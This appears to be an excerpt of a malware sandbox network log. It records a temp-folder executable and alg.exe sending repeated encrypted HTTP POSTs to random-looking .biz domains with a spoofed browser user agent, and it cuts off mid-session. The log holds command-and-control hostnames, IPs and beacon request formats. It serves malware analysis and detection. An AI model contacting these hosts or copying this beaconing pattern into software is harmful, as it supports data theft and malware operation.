Nov 26, 2024 08:14:35.133124113 CET  778                OUT        Data Raw: 48 ef 86 d2 a8 23 2a 5f fe 02 00 00 79 a7 14 7a f4 8d 0c ea f2 1e dc 73 b9 60 7e 57 22 79 6d 9f a9 62 33 f6 ce 94 ec 87 d4 09 a7 d3 ec c0 3a 60 f1 72 43 3c 2c 92 a9 f5 c3 d1 b3 08 06 f2 d5 75 40 d8 0a 99 cd a2 45 57 9e 01 32 52 5b 3e 1e bd 4e 28
                                                                   Data Ascii: H#*_yzs`~W"ymb3:`rC<,u@EW2R[>N(IEUUPPKW4dRm9<y$Eh7HCmXZ'}0^WpoU%@!suGltfT9TV`~`&g&C8}83M


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
34          192.168.2.10  50014        172.234.222.138  80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:36.456195116 CET  351                OUT        POST /opshcknhcx HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: fwiwk.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Nov 26, 2024 08:14:36.456231117 CET  778                OUT        Data Raw: 39 4a e9 43 83 0d 00 22 fe 02 00 00 d7 ce 50 8b 3a 68 76 d9 5a 3f b0 d1 09 4b 35 f3 87 66 b8 b2 15 31 ff 61 dd eb bb 19 d5 86 f3 a3 c2 37 dc 32 67 1e fa 47 d3 07 1b ae 27 e8 b9 fd 16 66 8b a2 d9 68 f5 22 2c fc 7d 7c c8 0b 04 41 ba f0 3b 4a 4b bd
                                                                   Data Ascii: 9JC"P:hvZ?K5f1a72gG'fh",}|A;JK|fq;4|%_L~]WTai*A{lCqNCfF)*fWYZ"QWt&5jJO*KN#&*kY_q^f -$L7D$


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
35          192.168.2.10  50015        34.246.200.160   80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:38.353823900 CET  350                OUT        POST /cmdgaowb HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: tbjrpv.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Nov 26, 2024 08:14:38.353823900 CET  778                OUT        Data Raw: b7 cb f5 fa 4b 66 60 46 fe 02 00 00 16 34 6a ff 69 e1 d2 5f 9e d8 de 11 c8 7c ba 55 4d c2 ff 73 e9 92 86 80 91 26 b8 a7 61 4f e4 f1 bb f2 57 9c 61 2e 0f bf 97 62 6e 2e 38 b2 36 1a 9e bc 10 3b a5 08 cb aa 5f cc 65 25 75 36 4b 5a 58 1b 9e df 1e 25
                                                                   Data Ascii: Kf`F4ji_|UMs&aOWa.bn.86;_e%u6KZX%9pCEji _-|Q~O.e.8iU17kh">AART'!^*wwT.<TPQekWCZA:$d7PhXBD&*|
Nov 26, 2024 08:14:39.765475988 CET  408                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Tue, 26 Nov 2024 07:14:39 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=820f1c0a66bf3a02224be4467871c96f|8.46.123.75|1732605279|1732605279|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.10  50016        47.129.31.212   80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:39.569245100 CET  349  OUT  POST /ijfjro HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: xlfhhhm.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:14:39.569339037 CET  834  OUT  Data Raw: 59 bc 13 80 11 42 b1 4e 36 03 00 00 4c 66 0b c8 eb 6e 8c 7e 41 3a df 72 25 8a 2a 3b de 4b d4 fe c5 64 1b 60 cb 18 03 18 14 72 d3 84 d6 e3 2b 6a eb 0c f8 64 1a ce ff 3b fb ed f4 f2 3e ab 9d 1e c5 47 22 40 8d ed c2 c3 ac 42 38 5f 3a c8 d9 7f eb 0a
  Data Ascii: YBN6Lfn~A:r%*;Kd`r+jd;>G"@B8_:H|MGi'@Go6Y{uOS!v#7J.@if$UW@,|nV,~qp!%BVpr7f%|!>EA{jE :w\ Ln
Nov 26, 2024 08:14:42.204216957 CET  409  IN   HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:14:41 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=b0469cb7cb7ab2df7f8f1682bd04e484|8.46.123.75|1732605281|1732605281|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.10  50017        18.208.156.248  80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:40.443382025 CET  352  OUT  POST /dvsybtnikly HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: deoci.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:14:40.443382025 CET  778  OUT  Data Raw: ea 97 64 32 19 a2 c0 ea fe 02 00 00 2b 09 ed 17 e5 fb 47 6b 58 25 90 b4 fb ca cb 9d 68 e2 22 78 35 48 78 35 88 a5 88 a1 dd 7c 8c 9b 44 3d b2 3c 15 7b 3e ad 2f a7 db 17 9e d7 3f 27 ae 2c dc 87 c0 74 a4 55 8c cd be f9 4b 4a e4 5a 9d bc 5a b0 6f 43
  Data Ascii: d2+GkX%h"x5Hx5|D=<{>/?',tUKJZZoCo2LywvGhQ%cQI .@p|:cJg<eo QR(hhhWG`B o.i\SZK]9
Nov 26, 2024 08:14:41.603873968 CET  407  IN   HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:14:41 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=7c0e29144aaed418d8272f539c63361f|8.46.123.75|1732605281|1732605281|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.10  50018        13.251.16.150   80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:42.492192984 CET  350  OUT  POST /kqhlsuvr HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ifsaia.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:14:42.492223024 CET  834  OUT  Data Raw: 10 68 94 64 2a a5 7b 16 36 03 00 00 35 64 d7 6b dc 1a dd c9 9a 57 b1 d8 0a a3 7d e1 c3 19 0c 4d 60 ac 76 47 f0 64 80 88 8e 50 37 ba c9 ce c1 7e 63 3e 25 ac 2d ce fb 0e cf 60 f9 8d 5c ba df ef bf 1c 6e 6a b8 10 f8 e1 99 cb f4 cf 93 a1 97 1d 76 0a
  Data Ascii: hd*{65dkW}M`vGdP7~c>%-`\njv2.B0\Yqe2f{#7kT1K\0-y!{U-](R?{[kGN!pnjR|{[79v"G/_k%fF
Nov 26, 2024 08:14:44.550344944 CET  408  IN   HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:14:44 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=f2a57d05d174a4d05b4444a9c151bfa4|8.46.123.75|1732605284|1732605284|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    39192.168.2.1050019208.100.26.245806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
Nov 26, 2024 08:14:42.642379045 CET | 360 | OUT | POST /emkvqhipcuidqkmd HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gytujflc.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:14:42.642451048 CET | 778 | OUT | Data Raw: [binary request body; hex dump omitted]
Nov 26, 2024 08:14:43.813335896 CET | 744 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.14.0 (Ubuntu)
  Date: Tue, 26 Nov 2024 07:14:43 GMT
  Content-Type: text/html
  Content-Length: 580
  Connection: keep-alive
  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 26, 2024 08:14:43.825306892 CET | 356 | OUT | POST /mqrfuyvbhtbn HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gytujflc.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:14:43.828644991 CET | 778 | OUT | Data Raw: [binary request body; hex dump omitted]
Nov 26, 2024 08:14:44.236932039 CET | 744 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.14.0 (Ubuntu)
  Date: Tue, 26 Nov 2024 07:14:44 GMT
  Content-Type: text/html
  Content-Length: 580
  Connection: keep-alive
  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.10 | 50020 | 44.221.84.105 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:44.864065886 CET | 347 | OUT | POST /wt HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: saytjshyf.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:14:44.864085913 CET | 834 | OUT | Data Raw: [binary request body; hex dump omitted]
Nov 26, 2024 08:14:46.005590916 CET | 411 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:14:45 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=44938078a5752b1db957be113c23cd4c|8.46.123.75|1732605285|1732605285|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.10 | 50021 | 13.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:44.934489965 CET | 347 | OUT | POST /fqwxf HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: qaynky.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:14:44.934520960 CET | 778 | OUT | Data Raw: [binary request body; hex dump omitted]
Nov 26, 2024 08:14:46.995250940 CET | 408 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:14:46 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=a6c872ebe435b3d52d824ede9e362257|8.46.123.75|1732605286|1732605286|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.10 | 50022 | 18.141.10.107 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:46.323909044 CET | 349 | OUT | POST /wxdopk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:46.323945999 CET | 834 | OUT | Data Raw: d5 6c b7 15 ed 82 9b 35 36 03 00 00 f3 76 7e 5d 0d a3 e5 e4 4a 9a d3 21 14 b0 f5 9b 04 df 20 38 ed a4 c1 8d 94 2d 5e 4d 00 2b 62 3a 04 8e 50 01 b8 a3 0d 37 78 e8 24 8d 26 51 bf 06 ac 1b 36 33 a5 3f 93 ab cc 91 4f 6f 84 25 96 fc cd 06 78 5c aa ed
Data Ascii: l56v~]J! 8-^M+b:P7x$&Q63?Oo%x\(zSez!ILrOq{yr#b4aU8!Y!mE_;W|VQ@/Fy/2bk@G(uQf#>qyF[;b<|
Nov 26, 2024 08:14:48.447369099 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1bc5ea05a1b0a80908c7392cb823cab9|8.46.123.75|1732605288|1732605288|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.10 | 50023 | 44.221.84.105 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:48.184844017 CET | 355 | OUT | POST /ifsivywgpp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:48.184886932 CET | 778 | OUT | Data Raw: 0e df d9 94 9b 51 7e f8 fe 02 00 00 03 b9 fd b5 df d7 fc 53 5b 0a 02 e4 45 81 96 84 b7 ce 57 71 d7 56 b3 6f f3 99 8b 8d 61 cf ba f4 46 39 fb a2 09 dd 01 26 f8 bf 30 bf 04 85 d9 78 aa a4 2a 6d c3 77 ce a3 e0 3d 5b 6a 1e 26 37 25 f2 9b 0e f4 d4 93
Data Ascii: Q~S[EWqVoaF9&0x*mw=[j&7%UEk8R*tjAS._%[2[-Kqx1=+oY8WcYf~w!{Nmbn^j3<5lYW,i![?/7]<pc7=dj
Nov 26, 2024 08:14:49.192790985 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d3505cc4cd332189843fbd1f994fc445|8.46.123.75|1732605289|1732605289|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.10 | 50024 | 172.234.222.138 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:48.762531996 CET | 344 | OUT | POST /kui HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:48.762635946 CET | 834 | OUT | Data Raw: f2 70 f5 5c 71 bf de 59 36 03 00 00 21 20 fb c8 62 6c c5 a8 00 0a 3f 04 97 e0 9c f2 6c ad 75 d1 f6 f0 7a 69 4e d0 a6 70 40 61 4b e2 e8 13 94 29 12 ae 57 f8 bd 90 37 33 f3 02 67 7d 5e 6c 82 8a 07 04 f8 c6 b5 87 31 39 3b bd 5b 46 c8 67 79 2f 02 58
Data Ascii: p\qY6! bl?luziNp@aK)W73g}^l19;[Fgy/XuS0F7A.8t<5Ym,/TFcTC^fhS\r]VMvTsRE=5A>B_1Qc<l~mzSBXLq[3zeg3+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.10 | 50026 | 54.244.188.177 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:49.908735991 CET | 355 | OUT | POST /qlejchqklyh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:49.908778906 CET | 778 | OUT | Data Raw: de 4c 10 4c ef 33 52 e4 fe 02 00 00 3f 1f db 2d bb 68 ca 5b de 52 69 36 04 e9 91 26 76 a4 e6 2e 0f 45 4d a5 d1 f8 68 6c 21 2c 53 e2 e5 a5 96 e1 a1 4e cf 99 f3 e8 4c bb d5 26 71 6f b9 80 25 91 23 9e 18 7a 17 54 03 b7 79 3f 65 e4 ce a7 c9 08 d8 62
Data Ascii: LL3R?-h[Ri6&v.EMhl!,SNL&qo%#zTy?ebn"vHOnvcJ|Z|aEuHy"zjJGTZu]>_O"f*eYb?4n;W1A;|[/OCqgIqe1m\
Nov 26, 2024 08:14:51.341267109 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=858c1a0b5aa389418d8386438d1cbb67|8.46.123.75|1732605291|1732605291|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 46 | Source IP: 192.168.2.10 | Source Port: 50027 | Destination IP: 172.234.222.138 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:50.103256941 CET | 347 bytes | OUT
POST /fvlqmp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:50.103306055 CET | 834 bytes | OUT
Data Raw: 05 ba fe 3b d9 b0 04 ab 36 03 00 00 19 6c 67 55 6d 01 83 c8 84 98 f6 e7 56 02 d6 f5 84 f3 7f c1 06 c1 c6 2d 7a 5a 47 02 79 78 6f f7 4e d8 ef ed 58 9f d8 25 d6 b5 4c 25 60 be 56 9b 83 9f 76 0a ae 9a ef b8 de 35 8d e3 aa 43 54 a1 47 5c ef 28 f7 40
Data Ascii: ;6lgUmV-zZGyxoNX%L%`Vv5CTG\(@Y(sxB!R!2!`f*4GlGS,yOH2fsOYLKxMZkTRM;%Au]5sM49qkN0ht1rjSL "Euk@G&


Session ID: 47 | Source IP: 192.168.2.10 | Source Port: 50028 | Destination IP: 34.246.200.160 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:51.633224964 CET | 348 bytes | OUT
POST /jmyxny HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:51.633224964 CET | 834 bytes | OUT
Data Raw: e5 e6 63 5e 4b 55 77 43 36 03 00 00 6b 2e fa 1d 41 5b 1d 3e a0 cf 5b 42 49 99 95 39 4d 92 c8 f8 96 95 c1 70 fc 4d 1b 7e 11 e3 f6 2b 92 ab 55 a2 9f 1e 35 95 8b 3a 5b ed 1e 61 0b e8 9e 5f 68 65 61 53 0c 72 33 e2 e5 cb 51 37 d5 40 8e a4 50 5b 53 95
Data Ascii: c^KUwC6k.A[>[BI9MpM~+U5:[a_heaSr3Q7@P[SN&=M$>9,,uu[Vzh3-Y`KJE7N<~udaTuf}gR(,%sHBp%(f8b`t$e4.>_weKHU%BKf|z
Nov 26, 2024 08:14:53.057336092 CET | 408 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f2db45fd0299ddb26b8c2a95261dd1b|8.46.123.75|1732605292|1732605292|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 48 | Source IP: 192.168.2.10 | Source Port: 50029 | Destination IP: 35.164.78.200 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:52.061834097 CET | 349 bytes | OUT
POST /fshqbiv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:52.061834097 CET | 778 bytes | OUT
Data Raw: 76 a9 bc 6e c4 ef 98 0e fe 02 00 00 c3 af 1f da 15 ff 4d 0f 95 6a 22 17 ab 2d 09 0a 8f ff 99 b7 69 b2 ef fb 36 49 36 1c 51 7c a1 e5 09 6d 0c 32 66 69 86 be 14 83 57 e5 22 ca c8 c4 52 cd 02 e0 8b 16 82 ad 99 9f e9 c0 26 d2 a0 bb 1d 4d 79 5e fd a7
Data Ascii: vnMj"-i6I6Q|m2fiW"R&My^bYxNc!Ya`eE?UsA?n@&uWU~ HJYYD,X1"/ka9j(&~_w'gLje*C1sc~!fdBDf3%9
Nov 26, 2024 08:14:53.514050961 CET | 408 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c5d0dcb92e2562f7161f9690fba6e090|8.46.123.75|1732605293|1732605293|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 49 | Source IP: 192.168.2.10 | Source Port: 50030 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:53.408643007 CET | 349 bytes | OUT
POST /tipcpxgs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:53.408674002 CET | 834 bytes | OUT
